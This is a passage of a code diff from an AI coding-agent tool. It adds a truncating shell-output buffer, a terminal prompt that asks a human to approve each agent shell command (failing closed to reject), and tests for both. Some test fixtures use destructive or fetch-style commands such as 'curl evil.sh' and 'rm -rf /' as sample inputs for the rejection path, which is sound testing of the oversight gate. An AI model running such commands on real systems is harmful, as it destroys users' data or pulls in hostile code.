+ * the in-memory full copy is itself bounded at a hard safety ceiling to avoid
+ * unbounded growth from a runaway command.
+ */
+export class OutputBuffer {
+  private head = '';
+  private headBytes = 0;
+  private readonly tailChunks: string[] = [];
+  private tailBytes = 0;
+  private totalBytesCount = 0;
+  /** Full copy for spillover, bounded by a hard ceiling. */
+  private full = '';
+  private fullTruncated = false;
+
+  private readonly headBudget: number;
+  private readonly tailBudget: number;
+  private readonly fullCeiling: number;
+
+  /**
+   * @param maxOutputBytes total byte budget for the returned (head+tail) window.
+   * @param fullCeiling hard ceiling for the in-memory full copy kept for spillover.
+   *        Defaults to a generous 16MB so the spill file holds the real output for
+   *        typical noisy logs, while still bounding memory for a runaway command.
+   */
+  constructor(maxOutputBytes: number, fullCeiling = 16 * 1024 * 1024) {
+    // Split the budget evenly between head and tail.
+    this.headBudget = Math.max(1, Math.floor(maxOutputBytes / 2));
+    this.tailBudget = Math.max(1, maxOutputBytes - this.headBudget);
+    // The full copy must hold at least the preview window.
+    this.fullCeiling = Math.max(fullCeiling, maxOutputBytes);
+  }
+
+  /** Append a chunk of output. Byte accounting uses UTF-8 byte length. */
+  append(chunk: string): void {
+    const bytes = Buffer.byteLength(chunk, 'utf8');
+    this.totalBytesCount += bytes;
+
+    // Maintain the full copy up to the ceiling (for spillover). Store as much of
+    // an oversized chunk as fits rather than dropping it wholesale.
+    if (!this.fullTruncated) {
+      const used = Buffer.byteLength(this.full, 'utf8');
+      const room = this.fullCeiling - used;
+      if (bytes <= room) {
+        this.full += chunk;
+      } else {
+        if (room > 0) {
+          this.full += Buffer.from(chunk, 'utf8').subarray(0, room).toString('utf8');
+        }
+        this.fullTruncated = true;
+      }
+    }
+
+    // Fill the head window first.
+    if (this.headBytes < this.headBudget) {
+      const room = this.headBudget - this.headBytes;
+      if (bytes <= room) {
+        this.head += chunk;
+        this.headBytes += bytes;
+        return;
+      }
+      // Partial: take what fits into head, the rest flows to tail.
+      const take = Buffer.from(chunk, 'utf8').subarray(0, room).toString('utf8');
+      this.head += take;
+      this.headBytes += Buffer.byteLength(take, 'utf8');
+      const rest = chunk.slice(take.length);
+      this.pushTail(rest);
+      return;
+    }
+
+    this.pushTail(chunk);
+  }
+
+  /** Push into the tail ring-buffer, evicting oldest data beyond the budget. */
+  private pushTail(chunk: string): void {
+    if (chunk.length === 0) return;
+    this.tailChunks.push(chunk);
+    this.tailBytes += Buffer.byteLength(chunk, 'utf8');
+    while (this.tailBytes > this.tailBudget && this.tailChunks.length > 1) {
+      const removed = this.tailChunks.shift()!;
+      this.tailBytes -= Buffer.byteLength(removed, 'utf8');
+    }
+    // If a single chunk alone exceeds the tail budget, trim it from the front.
+    if (this.tailBytes > this.tailBudget && this.tailChunks.length === 1) {
+      const only = this.tailChunks[0];
+      const overflow = this.tailBytes - this.tailBudget;
+      const buf = Buffer.from(only, 'utf8');
+      const trimmed = buf.subarray(overflow).toString('utf8');
+      this.tailChunks[0] = trimmed;
+      this.tailBytes = Buffer.byteLength(trimmed, 'utf8');
+    }
+  }
+
+  get totalBytes(): number {
+    return this.totalBytesCount;
+  }
+
+  get isTruncated(): boolean {
+    return this.totalBytesCount > this.headBytes + this.tailBytes;
+  }
+
+  /** The full captured output (bounded by the in-memory ceiling). */
+  getFull(): string {
+    return this.full;
+  }
+
+  /**
+   * Finalize the capture. When not truncated, returns the output verbatim. When
+   * truncated, spills the full output to a temp file and returns head + a gap
+   * note (with the file path) + tail.
+   *
+   * @param spill optional injected spill function (path-returning) for testing.
+   *        Defaults to writing into `os.tmpdir()`.
+   */
+  finalize(spill: (content: string) => string = defaultSpill): CappedOutput {
+    const tail = this.tailChunks.join('');
+    if (!this.isTruncated) {
+      return {
+        text: this.head + tail,
+        truncated: false,
+        totalBytes: this.totalBytesCount,
+      };
+    }
+
+    const spillPath = spill(this.full);
+    const fullNote = this.fullTruncated
+      ? `First ${Buffer.byteLength(this.full, 'utf8')} bytes`
+      : 'Full output';
+    const droppedNote =
+      `\n\n... [output truncated: ${this.totalBytesCount} bytes total; ` +
+      `showing first ${this.headBytes} + last ${this.tailBytes} bytes. ` +
+      `${fullNote} written to ${spillPath} — use read_file to inspect.] ...\n\n`;
+    return {
+      text: this.head + droppedNote + tail,
+      truncated: true,
+      totalBytes: this.totalBytesCount,
+      spillPath,
+    };
+  }
+}
+
+/** Default spill: write to a uniquely-named file in the OS temp dir. */
+function defaultSpill(content: string): string {
+  const name = `gsloth-shell-${Date.now()}-${Math.random().toString(36).slice(2, 10)}.log`;
+  const filePath = path.join(tmpdir(), name);
+  writeFileSync(filePath, content, 'utf8');
+  return filePath;
+}

--- a/packages/app/spec/codeCommand.spec.ts
+++ b/packages/app/spec/codeCommand.spec.ts
@@ -94,6 +94,7 @@ const gthAgentRunnerMock = vi.fn(function GthAgentRunnerMock() {
 const gthAgentRunnerInstanceMock = {
   init: vi.fn(),
   processMessages: vi.fn(),
+  setToolApprovalCallback: vi.fn(),
   cleanup: vi.fn(),
 };
 vi.mock('#src/core/GthAgentRunner.js', () => ({

--- a/packages/app/spec/tui/ApprovalPrompt.spec.tsx
+++ b/packages/app/spec/tui/ApprovalPrompt.spec.tsx
@@ -1,0 +1,206 @@
+import { describe, expect, it, vi } from 'vitest';
+import React from 'react';
+import { render } from 'ink-testing-library';
+import type {
+  AgentStreamEvent,
+  PendingToolInterrupt,
+  ToolApprovalDecision,
+} from '@gaunt-sloth/core/core/types.js';
+import type { PendingApproval, TuiAgent } from '#src/tui/types.js';
+import { App } from '#src/tui/components/App.js';
+import { ApprovalPrompt } from '#src/tui/components/ApprovalPrompt.js';
+
+/** A fake agent that replays a fixed event script for each turn. */
+function scriptedAgent(events: AgentStreamEvent[]): TuiAgent {
+  return {
+    async *runTurn() {
+      for (const event of events) {
+        yield event;
+        await Promise.resolve();
+      }
+    },
+  };
+}
+
+const baseProps = {
+  mode: 'chat',
+  readyMessage: '\nGaunt Sloth is ready to chat. Type your prompt.',
+  exitMessage: "Type 'exit' or Ctrl+C to exit chat · /help for commands\n",
+};
+
+const ESC = String.fromCharCode(27);
+
+/** A subscribeApproval the test can fire on demand, capturing the resolved decision. */
+function makeApprovalHarness() {
+  let emit: ((record: PendingApproval) => void) | undefined;
+  const subscribeApproval = (cb: (record: PendingApproval) => void) => {
+    emit = cb;
+    return () => {};
+  };
+  const request = (pending: PendingToolInterrupt) =>
+    new Promise<ToolApprovalDecision>((resolve) => {
+      emit?.({ pending, resolve });
+    });
+  return { subscribeApproval, request };
+}
+
+describe('tui <ApprovalPrompt>', () => {
+  it('renders the tool name, command text and the [o]/[s]/[a]/[N] choices', () => {
+    const { lastFrame, unmount } = render(
+      <ApprovalPrompt
+        pending={{ name: 'run_shell_command', args: { command: 'ls -la /tmp' } }}
+      />
+    );
+    const f = lastFrame() ?? '';
+    expect(f).toContain('run_shell_command');
+    expect(f).toContain('ls -la /tmp');
+    expect(f).toContain('[o]nce');
+    expect(f).toContain('[s]ession');
+    expect(f).toContain('[a]lways');
+    expect(f).toContain('[N]o');
+    unmount();
+  });
+
+  it('falls back to JSON of args when there is no command string', () => {
+    const { lastFrame, unmount } = render(
+      <ApprovalPrompt pending={{ name: 'run_shell_command', args: { foo: 'bar' } }} />
+    );
+    expect(lastFrame() ?? '').toContain('{"foo":"bar"}');
+    unmount();
+  });
+});
+
+describe('tui approval flow through <App>', () => {
+  it('shows the approval prompt with the command when an approval is pending', async () => {
+    const harness = makeApprovalHarness();
+    const agent = scriptedAgent([{ type: 'text', delta: 'hi' }]);
+    const { lastFrame, unmount } = render(
+      <App {...baseProps} agent={agent} subscribeApproval={harness.subscribeApproval} />
+    );
+
+    await vi.waitFor(() => expect(lastFrame()).toContain('>'));
+    void harness.request({ name: 'run_shell_command', args: { command: 'rm -rf build' } });
+
+    await vi.waitFor(() => {
+      const f = lastFrame() ?? '';
+      expect(f).toContain('run_shell_command');
+      expect(f).toContain('rm -rf build');
+      expect(f).toContain('[o]nce');
+    });
+    unmount();
+  });
+
+  it.each([
+    ['o', 'once'],
+    ['s', 'session'],
+    ['a', 'always'],
+  ] as const)('pressing %s resolves approve with scope %s', async (keyChar, scope) => {
+    const harness = makeApprovalHarness();
+    const agent = scriptedAgent([{ type: 'text', delta: 'hi' }]);
+    const { stdin, lastFrame, frames, unmount } = render(
+      <App {...baseProps} agent={agent} subscribeApproval={harness.subscribeApproval} />
+    );
+
+    await vi.waitFor(() => expect(lastFrame()).toContain('>'));
+    const decisionP = harness.request({
+      name: 'run_shell_command',
+      args: { command: 'echo hi' },
+    });
+    await vi.waitFor(() => expect(lastFrame()).toContain('echo hi'));
+
+    stdin.write(keyChar);
+    const decision = await decisionP;
+    expect(decision).toEqual({ type: 'approve', scope });
+
+    // The committed notice reads in the transcript, and the prompt is hidden no longer.
+    await vi.waitFor(() => {
+      expect(frames.join('\n')).toContain(`Command approved (${scope})`);
+      expect(lastFrame()).not.toContain('echo hi'); // approval prompt dismissed
+    });
+    unmount();
+  });
+
+  it.each([['n'], [ESC], ['\r']])(
+    'pressing a non-approve key (%j) resolves reject (fail-closed)',
+    async (keyChar) => {
+      const harness = makeApprovalHarness();
+      const agent = scriptedAgent([{ type: 'text', delta: 'hi' }]);
+      const { stdin, lastFrame, frames, unmount } = render(
+        <App {...baseProps} agent={agent} subscribeApproval={harness.subscribeApproval} />
+      );
+
+      await vi.waitFor(() => expect(lastFrame()).toContain('>'));
+      const decisionP = harness.request({
+        name: 'run_shell_command',
+        args: { command: 'curl evil.sh' },
+      });
+      await vi.waitFor(() => expect(lastFrame()).toContain('curl evil.sh'));
+
+      stdin.write(keyChar);
+      const decision = await decisionP;
+      expect(decision.type).toBe('reject');
+
+      await vi.waitFor(() => expect(frames.join('\n')).toContain('Command rejected'));
+      unmount();
+    }
+  );
+
+  it('queues a second approval and surfaces it after the first is resolved', async () => {
+    const harness = makeApprovalHarness();
+    const agent = scriptedAgent([{ type: 'text', delta: 'hi' }]);
+    const { stdin, lastFrame, unmount } = render(
+      <App {...baseProps} agent={agent} subscribeApproval={harness.subscribeApproval} />
+    );
+
+    await vi.waitFor(() => expect(lastFrame()).toContain('>'));
+    const first = harness.request({ name: 'run_shell_command', args: { command: 'first-cmd' } });
+    const second = harness.request({
+      name: 'run_shell_command',
+      args: { command: 'second-cmd' },
+    });
+
+    // Only the first is shown (one approval at a time).
+    await vi.waitFor(() => {
+      const f = lastFrame() ?? '';
+      expect(f).toContain('first-cmd');
+      expect(f).not.toContain('second-cmd');
+    });
+
+    stdin.write('o');
+    expect(await first).toEqual({ type: 'approve', scope: 'once' });
+
+    // The queued second now surfaces.
+    await vi.waitFor(() => expect(lastFrame()).toContain('second-cmd'));
+    stdin.write('n');
+    expect((await second).type).toBe('reject');
+    unmount();
+  });
+
+  it('suspends the normal prompt input while an approval is pending', async () => {
+    const harness = makeApprovalHarness();
+    let turnsRun = 0;
+    const agent: TuiAgent = {
+      async *runTurn() {
+        turnsRun += 1;
+        yield { type: 'text', delta: 'ran' };
+      },
+    };
+    const { stdin, lastFrame, unmount } = render(
+      <App {...baseProps} agent={agent} subscribeApproval={harness.subscribeApproval} />
+    );
+
+    await vi.waitFor(() => expect(lastFrame()).toContain('>'));
+    const decisionP = harness.request({
+      name: 'run_shell_command',
+      args: { command: 'gated' },
+    });
+    await vi.waitFor(() => expect(lastFrame()).toContain('gated'));
+
+    // Typing while the approval owns input must not enter the chat box or run a turn — every
+    // keystroke is consumed by the approval handler. 'x' is a non-approve key → reject.
+    stdin.write('x');
+    expect((await decisionP).type).toBe('reject');
+    expect(turnsRun).toBe(0);
+    unmount();
+  });
+});

--- a/packages/app/spec/tui/tuiSessionModule.spec.tsx
+++ b/packages/app/spec/tui/tuiSessionModule.spec.tsx
@@ -23,6 +23,7 @@ vi.mock('@gaunt-sloth/core/core/GthAgentRunner.js', () => {
   GthAgentRunner.prototype.cleanup = runnerCleanupMock;
   GthAgentRunner.prototype.processMessagesWithEvents = vi.fn();
   GthAgentRunner.prototype.resetThread = vi.fn();
+  GthAgentRunner.prototype.setToolApprovalCallback = vi.fn();
   return { GthAgentRunner };
 });
 

--- a/packages/app/src/tui/components/App.tsx
+++ b/packages/app/src/tui/components/App.tsx
@@ -8,8 +8,10 @@ import {
   type SubagentTreeViewModel,
   type TurnViewModel,
 } from '#src/tui/viewModel.js';
-import type { TranscriptItem, TuiAppProps } from '#src/tui/types.js';
+import type { PendingApproval, TranscriptItem, TuiAppProps } from '#src/tui/types.js';
+import type { ToolApprovalScope } from '@gaunt-sloth/core/core/types.js';
 import { Transcript } from '#src/tui/components/Transcript.js';
+import { ApprovalPrompt } from '#src/tui/components/ApprovalPrompt.js';
 import { LiveTurn } from '#src/tui/components/LiveTurn.js';
 import { StatusBar } from '#src/tui/components/StatusBar.js';
 import { PromptInput } from '#src/tui/components/PromptInput.js';
@@ -83,6 +85,16 @@ export function App(props: TuiAppProps): React.ReactElement {
   // swallowed because clearing <Static>'s items resets its internal index (TUI-C12). Hidden
   // again the moment the next user turn starts so it doesn't linger above a fresh conversation.
   const [clearedBanner, setClearedBanner] = useState(false);
+  // Tool-approval queue (EXT-9 Phase B2). The head record (if any) is the approval currently
+  // shown; while it is non-null the approval prompt OWNS keyboard input and the normal prompt is
+  // suspended, so the command can't be typed into the chat box. Additional requests queue behind
+  // it (only one approval is shown at a time) and surface as the head is resolved.
+  const [approvalQueue, setApprovalQueue] = useState<PendingApproval[]>([]);
+  const pendingApproval = approvalQueue[0] ?? null;
+  // Mirror for the synchronous useInput handler, so it can read+resolve the head without a stale
+  // closure (the handler is bound once and must not depend on the queue in its deps).
+  const approvalQueueRef = useRef<PendingApproval[]>([]);
+  approvalQueueRef.current = approvalQueue;
   // Mirror of toolsExpanded for the slash-command handler (memoized without it in deps), so
   // /tools can compute the next state without a stale closure or a side effect in the updater.
   const toolsExpandedRef = useRef(false);
@@ -193,6 +205,40 @@ export function App(props: TuiAppProps): React.ReactElement {
     // eslint-disable-next-line react-hooks/exhaustive-deps
   }, []);
 
+  // Resolve the currently-shown approval (the queue head) and commit a brief notice so the
+  // decision reads in the transcript (TUI-C14 notice conventions). Dequeues the head so the next
+  // queued approval (if any) surfaces. Approve carries the chosen scope; reject is fail-closed.
+  const resolveApproval = useCallback((decision: 'once' | 'session' | 'always' | 'reject') => {
+    const head = approvalQueueRef.current[0];
+    if (!head) return;
+    if (decision === 'reject') {
+      head.resolve({ type: 'reject', message: 'User rejected the shell command.' });
+      push({
+        kind: 'notice',
+        title: 'Command rejected',
+        lines: ['The shell command was not run; the agent was told you declined.'],
+        tone: 'warn',
+      });
+    } else {
+      const scope: ToolApprovalScope = decision;
+      head.resolve({ type: 'approve', scope });
+      const detail =
+        scope === 'once'
+          ? 'Approved this single invocation only.'
+          : scope === 'session'
+            ? 'Approved for this session — future variants will not re-prompt.'
+            : 'Approved and remembered — saved to the project allow-list.';
+      push({
+        kind: 'notice',
+        title: `Command approved (${scope})`,
+        lines: [detail],
+        tone: 'info',
+      });
+    }
+    setApprovalQueue((q) => q.slice(1));
+    // eslint-disable-next-line react-hooks/exhaustive-deps
+  }, []);
+
   const handleSubmit = useCallback(
     (value: string) => {
       if (runningRef.current) return;
@@ -289,6 +335,19 @@ export function App(props: TuiAppProps): React.ReactElement {
   //  3. While the panel is focused → Tab/Shift+Tab cycle sections, ↑/↓ scroll one line,
   //     PageUp/PageDown page-step, m maximises, Esc unfocuses.
   useInput((input, key) => {
+    // Highest priority: a pending tool approval OWNS the keyboard (EXT-9 Phase B2). While one is
+    // shown, o/s/a resolve approve with the matching scope; anything else (n, Esc, Enter, …)
+    // resolves reject — fail-closed, mirroring the readline path. We swallow the key either way
+    // so it can't fall through to abort/debug handling or get typed into the prompt.
+    if (approvalQueueRef.current.length > 0) {
+      const ch = input.toLowerCase();
+      if (ch === 'o') resolveApproval('once');
+      else if (ch === 's') resolveApproval('session');
+      else if (ch === 'a') resolveApproval('always');
+      else resolveApproval('reject');
+      return;
+    }
+
     if (key.escape && runningRef.current) {
       abortRef.current?.abort();
       return;
@@ -388,6 +447,16 @@ export function App(props: TuiAppProps): React.ReactElement {
     // eslint-disable-next-line react-hooks/exhaustive-deps
   }, []);
 
+  // Surface tool-approval requests bridged from the runner (EXT-9 Phase B2): each pending
+  // approval is appended to the queue; the head renders the <ApprovalPrompt> and owns input.
+  useEffect(() => {
+    if (!props.subscribeApproval) return;
+    return props.subscribeApproval((record) => {
+      setApprovalQueue((q) => [...q, record]);
+    });
+    // eslint-disable-next-line react-hooks/exhaustive-deps
+  }, []);
+
   // The greeting is an intro, not a permanent fixture: show it only before the first
   // exchange, so it stops padding the bottom dock once the conversation is underway.
   const showIntro = !initialMessage && transcript.length === 0 && !live;
@@ -416,6 +485,9 @@ export function App(props: TuiAppProps): React.ReactElement {
       ) : null}
       {/* Input dock: bracketed top and bottom by rules so the status bar, prompt and hint
           read as a distinct control zone rather than blending into the scrollback. */}
+      {/* Tool-approval affordance (EXT-9 Phase B2): when an approval is pending it sits just above
+          the input dock, owns the keyboard, and suspends the normal prompt below. */}
+      {pendingApproval ? <ApprovalPrompt pending={pendingApproval.pending} /> : null}
       <Rule />
       <StatusBar
         running={running}
@@ -424,7 +496,9 @@ export function App(props: TuiAppProps): React.ReactElement {
         turnCount={turnCount}
         debugHint={debugVisible && !debugFocused}
       />
-      {!running && !debugFocused ? <PromptInput onSubmit={handleSubmit} /> : null}
+      {!running && !debugFocused && !pendingApproval ? (
+        <PromptInput onSubmit={handleSubmit} />
+      ) : null}
       <Text dimColor>{exitMessage.trim()}</Text>
       <Rule />
     </Box>

--- a/packages/app/src/tui/components/ApprovalPrompt.tsx
+++ b/packages/app/src/tui/components/ApprovalPrompt.tsx
@@ -1,0 +1,37 @@
+import React from 'react';
+import { Box, Text } from 'ink';
+import { Rule } from '#src/tui/components/Rule.js';
+import type { PendingToolInterrupt } from '@gaunt-sloth/core/core/types.js';
+
+/**
+ * The scoped tool-approval affordance (EXT-9 Phase B2) — the Ink TUI counterpart to the
+ * readline `Approve? [o]nce / [s]ession / [a]lways / [N]o:` prompt. Shown when a
+ * `run_shell_command` interrupt is pending; styled like a warn-tone {@link CommandNotice}
+ * (yellow bold title + dim body bracketed by a rule) so it reads consistently in the
+ * transcript dock. While it is mounted the parent `<App>` routes keyboard input here and
+ * suspends the normal prompt, so the command can't be typed into the chat box.
+ *
+ * Pure/presentational: it only renders the pending command + the choices. The key handling
+ * (o/s/a → approve, anything else → reject) lives in `<App>`'s `useInput`, mirroring the way
+ * the debug panel's scroll keys are owned by the root component.
+ */
+export function ApprovalPrompt({
+  pending,
+}: {
+  pending: PendingToolInterrupt;
+}): React.ReactElement {
+  const commandText =
+    typeof pending.args.command === 'string'
+      ? (pending.args.command as string)
+      : JSON.stringify(pending.args);
+  return (
+    <Box flexDirection="column">
+      <Rule />
+      <Text bold color="yellow">
+        {`The agent wants to run a shell command via ${pending.name}`}
+      </Text>
+      <Text dimColor>{`    ${commandText}`}</Text>
+      <Text dimColor>{'Approve?  [o]nce   [s]ession   [a]lways   [N]o'}</Text>
+    </Box>
+  );
+}

--- a/packages/app/src/tui/tuiSessionModule.tsx
+++ b/packages/app/src/tui/tuiSessionModule.tsx
@@ -3,6 +3,10 @@ import { render } from 'ink';
 import { type CommandLineConfigOverrides, initConfig } from '@gaunt-sloth/core/config.js';
 import { GthAgentRunner } from '@gaunt-sloth/core/core/GthAgentRunner.js';
 import { StatusLevel } from '@gaunt-sloth/core/core/types.js';
+import type {
+  PendingToolInterrupt,
+  ToolApprovalDecision,
+} from '@gaunt-sloth/core/core/types.js';
 import {
   flushSessionLog,
   initSessionLogging,
@@ -18,7 +22,7 @@ import { GthDeepAgent } from '@gaunt-sloth/agent/core/GthDeepAgent.js';
 import type { SessionConfig } from '@gaunt-sloth/agent/modules/interactiveSessionModule.js';
 import type { BaseMessage } from '@langchain/core/messages';
 import { App } from '#src/tui/components/App.js';
-import type { TuiAgent, TuiDebugCapture } from '#src/tui/types.js';
+import type { PendingApproval, TuiAgent, TuiDebugCapture } from '#src/tui/types.js';
 import { renderHistory, renderRequestDetails, renderResponse } from '#src/tui/debugRender.js';
 import { viewportBumpSequence } from '#src/tui/terminal.js';
 import type { DebugRequestExtras } from '@gaunt-sloth/agent/core/debugCapture.js';
@@ -65,6 +69,53 @@ function createDebugBridge() {
           details: renderRequestDetails(extras),
         }),
       onResponse: (response: unknown) => emit({ kind: 'response', text: renderResponse(response) }),
+    },
+  };
+}
+
+/**
+ * Fan-out so the runner's tool-approval callback can reach the mounted React app. Modeled on
+ * {@link createStatusBridge}, but promise-based: when the runner suspends on a
+ * `run_shell_command` interrupt and calls the approval callback, the bridge creates a pending
+ * record (the {@link PendingToolInterrupt} plus a `resolve`), emits it to the subscribed
+ * `<App>`, and hands the callback a Promise it awaits until the app resolves a decision.
+ *
+ * Fail-closed: if the session ends / the app unmounts while an approval is still pending, every
+ * outstanding record is resolved as a reject (`abortPending`), so a suspended run can never hang
+ * — matching the readline path's "anything not o/s/a → reject" default.
+ */
+function createApprovalBridge() {
+  const listeners = new Set<(record: PendingApproval) => void>();
+  // Records that have been emitted but not yet resolved (used by abortPending on teardown).
+  const outstanding = new Set<PendingApproval>();
+  return {
+    /** Wired to `runner.setToolApprovalCallback`: returns a Promise the runner awaits. */
+    request: (pending: PendingToolInterrupt): Promise<ToolApprovalDecision> =>
+      new Promise<ToolApprovalDecision>((resolve) => {
+        let settled = false;
+        const record: PendingApproval = {
+          pending,
+          resolve: (decision) => {
+            if (settled) return;
+            settled = true;
+            outstanding.delete(record);
+            resolve(decision);
+          },
+        };
+        outstanding.add(record);
+        for (const l of listeners) l(record);
+      }),
+    subscribe: (cb: (record: PendingApproval) => void) => {
+      listeners.add(cb);
+      return () => {
+        listeners.delete(cb);
+      };
+    },
+    /** Resolve every still-pending approval as a reject (fail-closed) on teardown. */
+    abortPending: () => {
+      for (const record of [...outstanding]) {
+        record.resolve({ type: 'reject', message: 'Session ended before approval.' });
+      }
     },
   };
 }
@@ -118,10 +169,18 @@ export async function createTuiSession(
 
   const bridge = createStatusBridge();
   const debugBridge = createDebugBridge();
+  const approvalBridge = createApprovalBridge();
   const runner = new GthAgentRunner(bridge.emit, createResolvers(), gthDeepAgentFactory);
 
   try {
     await runner.init(sessionConfig.mode, config, checkpointSaver);
+
+    // Tool-approval (human-in-the-loop) prompt for gated tools — the readline counterpart in
+    // interactiveSessionModule. The runner consults the allow-list BEFORE calling this, so
+    // trusted commands never reach the TUI prompt; otherwise the bridge surfaces the pending
+    // command in the mounted <App> and awaits the human's scoped decision (o/s/a → approve,
+    // anything else → reject, fail-closed).
+    runner.setToolApprovalCallback((pending) => approvalBridge.request(pending));
 
     // Attach the debug sink to the live deep agent (opt-in; the wrapModelCall middleware reads
     // it lazily, so this only enables capture for the TUI's /debug panel — the lean/AG-UI
@@ -172,9 +231,13 @@ export async function createTuiSession(
         initialMessage={message}
         subscribeStatus={bridge.subscribe}
         subscribeDebug={debugBridge.subscribe}
+        subscribeApproval={approvalBridge.subscribe}
         onTurnComplete={logTurn}
         onResetFrame={() => resetFrame?.()}
         onExit={async () => {
+          // Fail-closed: resolve any approval still awaiting a decision before tearing down,
+          // so a suspended run can never hang on an unanswered prompt.
+          approvalBridge.abortPending();
           await runner.cleanup();
           stopSessionLogging();
         }}
@@ -184,6 +247,7 @@ export async function createTuiSession(
 
     await instance.waitUntilExit();
   } catch (err) {
+    approvalBridge.abortPending();
     await runner.cleanup();
     stopSessionLogging();
     throw err;

--- a/packages/app/src/tui/types.ts
+++ b/packages/app/src/tui/types.ts
@@ -1,6 +1,21 @@
-import type { AgentStreamEvent } from '@gaunt-sloth/core/core/types.js';
+import type {
+  AgentStreamEvent,
+  PendingToolInterrupt,
+  ToolApprovalDecision,
+} from '@gaunt-sloth/core/core/types.js';
 import type { TurnViewModel } from '#src/tui/viewModel.js';
 import type { CommandNoticeTone } from '#src/tui/components/CommandNotice.js';
+
+/**
+ * One in-flight tool-approval request bridged from the runner into the mounted `<App>`
+ * (EXT-9 Phase B2): the {@link PendingToolInterrupt} the runner suspended on, plus a `resolve`
+ * that hands the human's {@link ToolApprovalDecision} back to the awaiting runner callback.
+ * Idempotent — calling `resolve` more than once is a no-op (the first decision wins).
+ */
+export interface PendingApproval {
+  pending: PendingToolInterrupt;
+  resolve: (decision: ToolApprovalDecision) => void;
+}
 
 /**
  * The minimal agent surface the Ink `<App>` drives. Decoupling the component from
@@ -58,6 +73,13 @@ export interface TuiAppProps {
    * so the readline/AG-UI paths and the fixture agent (which have no such sink) simply omit it.
    */
   subscribeDebug?: (cb: (capture: TuiDebugCapture) => void) => () => void;
+  /**
+   * Subscribe to tool-approval requests bridged from the runner (EXT-9 Phase B2): each
+   * {@link PendingApproval} carries the pending `run_shell_command` interrupt and a `resolve`
+   * the app calls with the human's scoped decision. Optional so the fixture/AG-UI paths (which
+   * never surface approvals) simply omit it.
+   */
+  subscribeApproval?: (cb: (record: PendingApproval) => void) => () => void;
   /** Called once a turn finishes, with the user input and the final assistant text. */
   onTurnComplete?: (userInput: string, assistantText: string) => void;
   /**

--- a/packages/core/spec/GthAgentRunner.spec.ts
+++ b/packages/core/spec/GthAgentRunner.spec.ts
@@ -71,6 +71,10 @@ describe('GthAgentRunner', () => {
     mockAgent.stream.mockClear();
     mockAgent.streamWithEvents.mockClear();
     mockAgent.cleanup.mockClear();
+    // The HITL interrupt methods are added per-test on the shared mock; remove any that leaked
+    // from a previous test so unrelated cases see an agent without interrupt support (no-op loop).
+    delete (mockAgent as any).getPendingToolInterrupts;
+    delete (mockAgent as any).streamResume;
 
     statusUpdateCallback = vi.fn();
 
@@ -272,6 +276,80 @@ describe('GthAgentRunner', () => {
         const message = error instanceof Error ? error.message : String(error);
         expect(message).not.toMatch(/gcloud auth application-default login/);
       }
+    });
+  });
+
+  describe('tool-approval interrupts (run_shell_command)', () => {
+    function streamOf(...chunks: string[]) {
+      return {
+        async *[Symbol.asyncIterator]() {
+          for (const c of chunks) yield c;
+        },
+      };
+    }
+
+    it('approves a pending tool call via the callback, then resumes with an approve decision', async () => {
+      const runner = new GthAgentRunner(statusUpdateCallback);
+      // Initial turn streams some text, then suspends on one pending tool call.
+      mockAgent.stream.mockResolvedValue(streamOf('working'));
+      const getPending = vi
+        .fn()
+        // First check: one pending command. Second check (after resume): none.
+        .mockResolvedValueOnce([{ name: 'run_shell_command', args: { command: 'ls -la' } }])
+        .mockResolvedValueOnce([]);
+      const streamResume = vi.fn().mockResolvedValue(streamOf(' done'));
+      (mockAgent as any).getPendingToolInterrupts = getPending;
+      (mockAgent as any).streamResume = streamResume;
+
+      await runner.init(undefined, { ...mockConfig, streamOutput: true });
+      const approve = vi.fn().mockResolvedValue({ type: 'approve' });
+      runner.setToolApprovalCallback(approve);
+
+      const result = await runner.processMessages([new HumanMessage('run ls')]);
+
+      expect(approve).toHaveBeenCalledWith({
+        name: 'run_shell_command',
+        args: { command: 'ls -la' },
+      });
+      // Resume sent the HITL decisions array shape humanInTheLoopMiddleware expects.
+      expect(streamResume).toHaveBeenCalledWith(
+        { decisions: [{ type: 'approve' }] },
+        expect.anything()
+      );
+      expect(result).toBe('working done');
+    });
+
+    it('rejects when no approval callback is wired (non-interactive default)', async () => {
+      const runner = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('working'));
+      (mockAgent as any).getPendingToolInterrupts = vi
+        .fn()
+        .mockResolvedValueOnce([{ name: 'run_shell_command', args: { command: 'rm -rf /' } }])
+        .mockResolvedValueOnce([]);
+      const streamResume = vi.fn().mockResolvedValue(streamOf(''));
+      (mockAgent as any).streamResume = streamResume;
+
+      await runner.init(undefined, { ...mockConfig, streamOutput: true });
+      // No setToolApprovalCallback → default reject.
+      mockAgent.invoke.mockResolvedValue('rejected and continued');
+
+      await runner.processMessages([new HumanMessage('run rm')]);
+
+      const resumeArg = streamResume.mock.calls[0][0];
+      expect(resumeArg.decisions[0].type).toBe('reject');
+    });
+
+    it('does not attempt interrupt resolution when the agent lacks getState support', async () => {
+      const runner = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('hello'));
+      // No getPendingToolInterrupts / streamResume on the mock → loop no-ops.
+      delete (mockAgent as any).getPendingToolInterrupts;
+      delete (mockAgent as any).streamResume;
+
+      await runner.init(undefined, { ...mockConfig, streamOutput: true });
+      const result = await runner.processMessages([new HumanMessage('hi')]);
+
+      expect(result).toBe('hello');
     });
   });
 

--- a/packages/core/spec/GthAgentRunner.spec.ts
+++ b/packages/core/spec/GthAgentRunner.spec.ts
@@ -339,6 +339,140 @@ describe('GthAgentRunner', () => {
       expect(resumeArg.decisions[0].type).toBe('reject');
     });
 
+    // EXT-9 Tier-2: session-scoped allow-list config (persistence off so no disk writes).
+    const ALLOWLIST_CONFIG = {
+      streamOutput: true as const,
+      commands: { code: { devTools: { shell: { enabled: true, persistAllowlist: false } } } },
+    };
+
+    it('records a session-scoped approval, then auto-approves a variant without re-prompting', async () => {
+      const runner = new GthAgentRunner(statusUpdateCallback);
+      mockAgent.stream.mockResolvedValue(streamOf('first'));
+      // Two suspends: first on `git checkout main`, then (after resume) on `git checkout -b x`.
+      (mockAgent as any).getPendingToolInterrupts = vi
+        .fn()
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout main' } },
+        ])
+        .mockResolvedValueOnce([
+          { name: 'run_shell_command', args: { command: 'git checkout -b x' } },
+        ])
+        .mockResolvedValueOnce([]);
+      (mockAgent as any).streamResume = vi.fn().mockResolvedValue(streamOf(''));
+
+      await runner.init('code', { ...mockConfig, ...ALLOWLIST_CONFIG });
+      // Human grants 'session' on the first command only.
